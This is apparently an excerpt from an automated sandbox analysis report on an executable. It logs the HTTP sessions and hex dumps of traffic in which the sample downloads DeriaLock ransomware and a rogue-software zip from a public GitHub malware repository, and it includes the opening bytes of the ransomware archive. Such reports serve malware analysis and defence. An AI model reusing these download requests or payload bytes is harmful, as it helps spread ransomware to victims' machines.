22 20
                                                                                                        Data Ascii: .5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true"
                                                                                                        2022-09-29 12:46:50 UTC16115INData Raw: 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69
                                                                                                        Data Ascii: e px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigati
                                                                                                        2022-09-29 12:46:50 UTC16116INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31
                                                                                                        Data Ascii: component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1
                                                                                                        2022-09-29 12:46:50 UTC16117INData Raw: 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20
                                                                                                        Data Ascii: jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All
                                                                                                        2022-09-29 12:46:50 UTC16119INData Raw: 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 63 31 61 64 37 61 32 33 30 30 33 33 33 32 37 31 61 63 63 61 36 66 64 37 34 31 62 32 64 64 39 36 36 38 38 36 38 38 30 38 62 31 34 32 61 33 66 61 35 62 39 30 38 33 63 65 63 61 63 33 66 64 62 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 67 61 2d 63 6c 69 63 6b 3d 22 28 4c 6f 67 67 65 64 20 6f 75 74 29 20 48 65 61 64 65 72 2c 20 63 6c 69 63 6b 65 64
                                                                                                        Data Ascii: ://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c1ad7a2300333271acca6fd741b2dd9668868808b142a3fa5b9083cecac3fdb0" data-ga-click="(Logged out) Header, clicked
                                                                                                        2022-09-29 12:46:50 UTC16120INData Raw: 38 30 30 30 0d 0a 6e 22 20 6e 61 6d 65 3d 22 61 75 74 68 65 6e 74 69 63 69 74 79 5f 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 4a 47 39 69 6c 77 4f 71 54 46 39 4d 44 73 51 52 78 7a 66 38 6f 52 4c 43 4a 70 2d 2d 66 38 4c 79 39 61 32 4f 42 51 66 41 62 70 76 66 31 51 38 33 36 4d 69 51 47 4c 59 65 41 66 59 64 4f 44 67 53 78 53 46 48 5a 49 52 58 32 79 65 66 53 66 72 30 53 58 58 7a 76 77 22 20 2f 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 3e 0a 20 20 20 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 0a 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 20 63 6c 61
                                                                                                        Data Ascii: 8000n" name="authenticity_token" value="JG9ilwOqTF9MDsQRxzf8oRLCJp--f8Ly9a2OBQfAbpvf1Q836MiQGLYeAfYdODgSxSFHZIRX2yefSfr0SXXzvw" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field" cla
                                                                                                        2022-09-29 12:46:50 UTC16121INData Raw: 6e 74 65 67 72 61 74 69 6f 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 31 39 36 66 22 20 68 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 22 20 76 61 6c 75 65 3d 22 31 36 36 34 34 35 35 36 31 30 30 38 32 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22
                                                                                                        Data Ascii: ntegration" autocomplete="off" class="form-control" /><input type="text" name="required_field_196f" hidden="hidden" class="form-control" /><input type="hidden" name="timestamp" value="1664455610082" autocomplete="off" class="form-control" /><input type="
                                                                                                        2022-09-29 12:46:50 UTC16122INData Raw: 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 63 31 61 64 37 61 32 33 30 30 33 33 33 32 37 31 61 63 63 61 36 66 64 37 34 31 62 32 64 64 39 36 36 38 38 36 38 38 30 38 62 31 34 32 61 33 66 61 35 62 39 30 38 33 63 65 63 61
                                                                                                        Data Ascii: quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c1ad7a2300333271acca6fd741b2dd9668868808b142a3fa5b9083ceca
                                                                                                        2022-09-29 12:46:50 UTC16124INData Raw: 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 26 23 33 39 3b 20 72 65 70 6f 73 69 74 6f 72 79 20 64 6f 65 73 6e 26 23 33 39 3b 74 20 63 6f 6e 74 61 69 6e 20 74 68 65 20 26 23 33 39 3b 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 23 33 39 3b 20 70 61 74 68 20 69 6e 20 26 23 33 39 3b 6d 61 73 74 65 72 26 23 33 39 3b 2e 0a 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 3c 74 65 6d 70 6c 61 74 65 20 63 6c 61 73 73 3d 22 6a 73 2d 66 6c 61 73 68 2d 74 65 6d 70 6c 61 74 65 22 3e 0a 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 61 73 68 20 66 6c 61 73 68 2d 66 75 6c 6c 20 20 20 7b 7b 20 63 6c 61 73 73 4e 61 6d 65 20 7d 7d 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 78 2d 32 22 20 3e 0a 20 20
                                                                                                        Data Ascii: anch/MalwareDatabase&#39; repository doesn&#39;t contain the &#39;rogues/Win7Recover.zip&#39; path in &#39;master&#39;. </div></div> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" >
                                                                                                        2022-09-29 12:46:50 UTC16125INData Raw: 70 78 22 3e 0a 20 20 20 20 20 20 3c 69 6d 67 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 6a 73 2d 70 6c 61 78 69 66 79 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 22 20 64 61 74 61 2d 69 6e 76 65 72 74 3d 22 74 72 75 65 22 20 64 61 74 61 2d 78 72 61 6e 67 65 3d 22 30 22 20 64 61 74 61 2d 79 72 61 6e 67 65 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 34 31 35 22 20 77 69 64 74 68 3d 22 39 34 30 22 20 73 74 79 6c 65 3d 22 74 6f 70 3a 20 2d 32 30 70 78 3b 20 6c 65 66 74 3a 20 2d 32 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 77 69 64 74 68 3a 20 31 31 30 25 3b 20 68 65 69 67 68 74 3a 20 34 32 35 70 78 22 0a 20 20 20 20 20 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a
                                                                                                        Data Ascii: px"> <img alt="" class="js-plaxify position-absolute" data-invert="true" data-xrange="0" data-yrange="20" height="415" width="940" style="top: -20px; left: -20px; z-index: 1; width: 110%; height: 425px" src="data:image/jpeg;base64,/9j/4AAQSkZJ
                                                                                                        2022-09-29 12:46:50 UTC16126INData Raw: 6f 41 33 51 36 6f 47 41 38 45 54 4a 68 61 36 30 69 67 74 55 4b 66 45 6c 69 64 56 55 4f 41 35 67 4d 69 55 32 4a 51 71 6d 49 38 45 44 4d 2f 4b 73 54 4f 54 69 30 37 65 43 71 55 34 74 5a 57 46 4e 69 72 68 46 41 4e 56 49 55 77 74 56 69 55 77 43 6f 59 57 71 70 56 42 61 6f 55 77 74 56 51 32 50 44 44 64 41 77 74 33 51 4d 4c 41 4f 55 51 7a 63 4b 34 77 47 41 4b 73 51 77 73 51 4f 4c 4f 45 44 59 4a 68 4d 6d 78 51 68 68 59 71 52 73 46 55 4e 67 67 59 57 38 4b 4c 6a 49 34 68 56 49 4c 4a 44 6d 4e 69 71 44 69 68 52 78 52 4b 4f 48 43 46 4d 4c 44 73 67 4f 48 4b 49 4f 43 4b 4f 43 49 4f 43 47 52 77 55 55 63 46 55 35 42 78 55 4b 32 4b 70 59 4f 43 51 72 59 48 5a 41 63 4f 45 4b 4f 48 43 6e 4d 63 75 52 77 4f 79 73 4b 32 42 51 35 57 77 52 47 77 55 61 62 42 56 47 77 51 48 42 42 73
                                                                                                        Data Ascii: oA3Q6oGA8ETJha60igtUKfElidVUOA5gMiU2JQqmI8EDM/KsTOTi07eCqU4tZWFNirhFANVIUwtViUwCoYWqpVBaoUwtVQ2PDDdAwt3QMLAOUQzcK4wGAKsQwsQOLOEDYJhMmxQhhYqRsFUNggYW8KLjI4hVILJDmNiqDihRxRKOHCFMLDsgOHKIOCKOCIOCGRwUUcFU5BxUK2KpYOCQrYHZAcOEKOHCnMcuRwOysK2BQ5WwRGwUabBVGwQHBBs
                                                                                                        2022-09-29 12:46:50 UTC16128INData Raw: 45 37 49 56 73 54 73 66 42 43 74 67 64 6c 46 48 41 6f 6c 44 43 35 46 6f 2f 54 4b 49 32 43 69 35 62 42 55 72 59 38 49 67 59 6a 5a 52 52 78 2f 79 55 67 32 50 43 52 51 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a 77 55 43 47 77 37 49 45 4e 6d 72 4c 4b 34 49 62 45 71 70 6d 77 71 4c 53 6d 31 53 4c 53 47 7a 78 32 55 79 71 57 43
                                                                                                        Data Ascii: E7IVsTsfBCtgdlFHAolDC5Fo/TKI2Ci5bBUrY8IgYjZRRx/yUg2PCRQxGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZwUCGw7IENmrLK4IbEqpmwqLSm1SLSGzx2UyqWC
                                                                                                        2022-09-29 12:46:50 UTC16129INData Raw: 51 34 74 63 71 69 77 74 6f 6f 47 46 76 44 42 61 77 79 71 4c 65 79 43 6c 74 70 37 62 4b 70 68 57 32 31 2b 64 6b 46 42 61 74 59 77 7a 6c 51 57 46 43 71 43 7a 52 6b 53 34 4f 4c 46 55 71 6f 73 51 55 46 69 75 44 4b 67 73 54 43 5a 79 6f 4c 4f 46 55 4f 4c 4f 45 4b 63 57 44 5a 58 42 6b 34 74 34 56 6a 4a 78 59 67 63 57 67 61 49 55 34 74 47 79 49 59 57 75 68 6e 42 78 5a 77 71 68 78 59 67 59 57 38 4f 67 59 57 6e 5a 41 32 42 32 56 54 34 6e 48 70 37 70 55 48 42 43 6d 77 51 4d 4c 43 71 55 52 36 61 4a 54 44 30 77 67 59 57 44 5a 55 77 4f 49 32 55 67 5a 69 6b 42 78 4b 73 42 77 4b 49 62 42 46 48 42 51 4d 4c 65 46 59 6c 62 44 68 4d 47 63 6d 77 4f 79 66 45 2b 41 34 46 43 6a 67 68 79 6a 67 6c 42 77 51 6a 59 49 44 68 77 68 42 78 34 56 42 77 34 43 44 59 71 4b 4f 4a 51 62 42 45
                                                                                                        Data Ascii: Q4tcqiwtooGFvDBawyqLeyCltp7bKphW21+dkFBatYwzlQWFCqCzRkS4OLFUqosQUFiuDKgsTCZyoLOFUOLOEKcWDZXBk4t4VjJxYgcWgaIU4tGyIYWuhnBxZwqhxYgYW8OgYWnZA2B2VT4nHp7pUHBCmwQMLCqUR6aJTD0wgYWDZUwOI2UgZikBxKsBwKIbBFHBQMLeFYlbDhMGcmwOyfE+A4FCjghyjglBwQjYIDhwhBx4VBw4CDYqKOJQbBE


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.449713140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:07 UTC698OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:08 UTC698INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:08 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:08 UTC698INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.449714185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:08 UTC700OUTGET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:08 UTC700INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 215551
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:08 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6933-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455508.097614,VS0,VE4
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: f034bcf1747c48e33c49fdf9871ecda17fb7d015
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:08 GMT
                                                                                                        Source-Age: 56
                                                                                                        2022-09-29 12:45:08 UTC701INData Raw: 50 4b 03 04 14 00 01 00 08 00 b9 44 9d 49 fb a7 08 f7 49 49 03 00 00 90 07 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 44 65 72 69 61 4c 6f 63 6b 2e 65 78 65 8f 5e c1 d2 4e 0d 5f 39 3e ec 9e 1a 00 e0 ba e5 f5 be 9e 96 4e e6 01 53 65 32 9c ef 35 79 aa 89 be e7 a1 c5 67 ef 92 69 5f 6a cd 1e 64 76 70 1a 6a aa 4b 9a fa 65 0d 36 ac dc 2d fa 18 41 f4 90 27 10 c4 f7 86 51 d7 e1 38 f9 19 23 6a 06 4f b5 90 c1 dd c3 23 3c 19 77 e3 44 06 84 ce 90 3c c2 c7 5f 60 30 36 92 57 7f 96 fa 21 09 c1 ef 1a 4b 1b dd 2c 93 f5 d6 b9 79 75 8a 42 65 ef 69 bf c5 84 8a 58 98 3b 72 e6 2b a7 c3 d9 22 01 60 13 a6 b8 0a 02 a3 ac 92 01 17 24 1f 36 a3 d5 4a 7e fc d3 56 64 b6 8b 10 96 4c 8b 86 ef 7b 8c dd af 2b b6 2c 1f b6 9f 38 6c 79 5c 08 53 02 ea be fc 69 9a ee fb 19 3c 74 bb 8d 5e
                                                                                                        Data Ascii: PKDIIIEndermanch@DeriaLock.exe^N_9>NSe25ygi_jdvpjKe6-A'Q8#jO#<wD<_`06W!K,yuBeiX;r+"`$6J~VdL{+,8ly\Si<t^
                                                                                                        2022-09-29 12:45:08 UTC702INData Raw: 94 c5 72 fa c2 61 fb 91 6f d4 4d 42 a4 e2 fd 95 ef a3 4a c6 21 f1 04 3c d2 65 f4 87 54 3b b1 d9 24 6b bb 53 35 98 8a 46 94 13 e5 e5 71 37 5e a0 a4 3f de 39 e4 f7 0f 6c ae 3b 7d e2 9f 02 68 e9 7a 0f 04 0f 84 99 12 17 84 40 6a 21 45 6e ab a8 1c ad 5b fd 63 f9 d6 b7 03 b3 08 85 3a ff 28 c3 ce f2 4e 28 9a 06 ba bd b1 c1 c6 1d 18 8c c8 75 9a 08 e7 6c 69 b8 f9 2c ac ff 76 1e 5e 31 2f 04 2d 59 0f 0a f1 3d ad fe da ff 60 35 1e 9f 9d fe a7 48 5e 42 0a b7 4a 71 86 b0 e6 0f 22 37 8f 61 c6 d8 4b 4e fd 68 7d 39 85 cc 2d 7f 8c 69 8b e4 87 12 20 eb ad ec ff 34 6a 74 ce a1 3f ea 35 4f b0 e6 0e 10 6e e4 e9 e4 09 a9 52 52 6e 8d d1 a3 dd 76 d9 20 a7 64 70 a8 c7 f8 a9 2e f1 15 0c b6 22 f1 61 65 01 fb 6e 71 61 84 fb 5d c9 b5 52 52 68 f3 91 fd 77 47 da 1b cc 5d 1a 62 0f 15 2e
                                                                                                        Data Ascii: raoMBJ!<eT;$kS5Fq7^?9l;}hz@j!En[c:(N(uli,v^1/-Y=`5H^BJq"7aKNh}9-i 4jt?5OnRRnv dp."aenqa]RRhwG]b.
                                                                                                        2022-09-29 12:45:08 UTC704INData Raw: cc 05 3d e1 b2 30 5b de b2 9b d9 d6 ea ab b5 85 1b 89 f4 ee de e4 8b 82 3a e3 6f 98 0e 69 a4 4a 2e 2a 96 04 cd 1b e0 65 13 c3 4a 40 9d 44 04 e8 a1 fb 80 50 b2 06 cc 12 bd 98 b4 82 db 35 c7 66 6b 16 d7 3f a8 61 a3 f5 3d 63 4d b6 f1 8f ef e0 0d 11 e8 2b 3e e4 4e a3 4a a5 d6 fe 96 93 dd 4c bc e2 8e 68 31 5b 64 91 7e f0 77 34 f8 29 a9 ab 7a 16 db 82 b8 5b a1 c1 7f 0a c5 b2 6c 46 82 28 54 17 10 1f dd 03 e2 4b 23 e9 5e 0d aa 2a 56 cd b9 dc 53 bf dd fc cf 38 80 26 02 b1 1b 19 b9 63 2d 94 8f e9 5a 65 0b 9a 0b 97 8d 9e 9d d0 9d 6e 52 5e 88 67 34 e3 cd ed a8 6a 1d 92 5c d2 ba 45 05 8e 75 6b 4d da 87 f9 0e f4 be fa 0f 3c 36 11 0e ab 28 64 11 7b 52 fb ce c0 43 99 2e 2a 72 6e 53 27 e6 59 7d 32 18 70 28 f6 1c c1 93 a0 10 cf 8c 1b 83 f0 f3 7d fe b9 c5 61 70 07 72 f1 4c
                                                                                                        Data Ascii: =0[:oiJ.*eJ@DP5fk?a=cM+>NJLh1[d~w4)z[lF(TK#^*VS8&c-ZenR^g4j\EukM<6(d{RC.*rnS'Y}2p(}aprL
                                                                                                        2022-09-29 12:45:08 UTC705INData Raw: 9b 61 d3 15 e1 24 fe 26 e5 91 eb af 6a 86 10 ed ae 06 0e 8f c4 a1 c0 45 4d 9d 33 c0 fd 40 f7 6d 09 4e cc ee 84 c9 07 3b 6d c4 21 7b 31 2a 1f 56 12 c6 e5 da ef e7 95 fd 9b d7 29 d7 fd 86 54 27 af ce 04 86 09 32 4a 79 6a 97 0a dd 2f 97 a1 08 e5 1e 72 35 5f 7d ec 5b 70 39 a1 01 2d a5 85 44 69 16 87 fd d4 2a 46 22 a0 93 ea 40 c5 22 f6 70 7d a8 05 a7 fa b2 23 0b 73 ce 0c 13 94 6d 09 29 37 be d8 50 30 c1 2f 01 b9 51 af 19 0a 7b 21 a1 54 df 6d 7b b9 c0 91 ee 4f bb 3b a8 7d f1 90 9a b6 e7 3e f4 d4 c1 e2 af 89 6c ef 9c 3d 2e 39 1a 79 d9 60 70 a8 21 26 6f 3f fc a7 13 c0 f3 77 5c e7 b4 ee c8 f5 a8 83 de 12 e7 3c cc 62 66 e2 86 53 6f df ec e9 b2 7d 3a f1 4f 95 7b a5 82 f0 47 04 43 b6 ef 99 e4 41 be 7d 82 25 0f c3 ab 00 8b 57 83 b0 9e 76 71 64 35 a7 63 1f d8 bc 8a 90
                                                                                                        Data Ascii: a$&jEM3@mN;m!{1*V)T'2Jyj/r5_}[p9-Di*F"@"p}#sm)7P0/Q{!Tm{O;}>l=.9y`p!&o?w\<bfSo}:O{GCA}%Wvqd5c
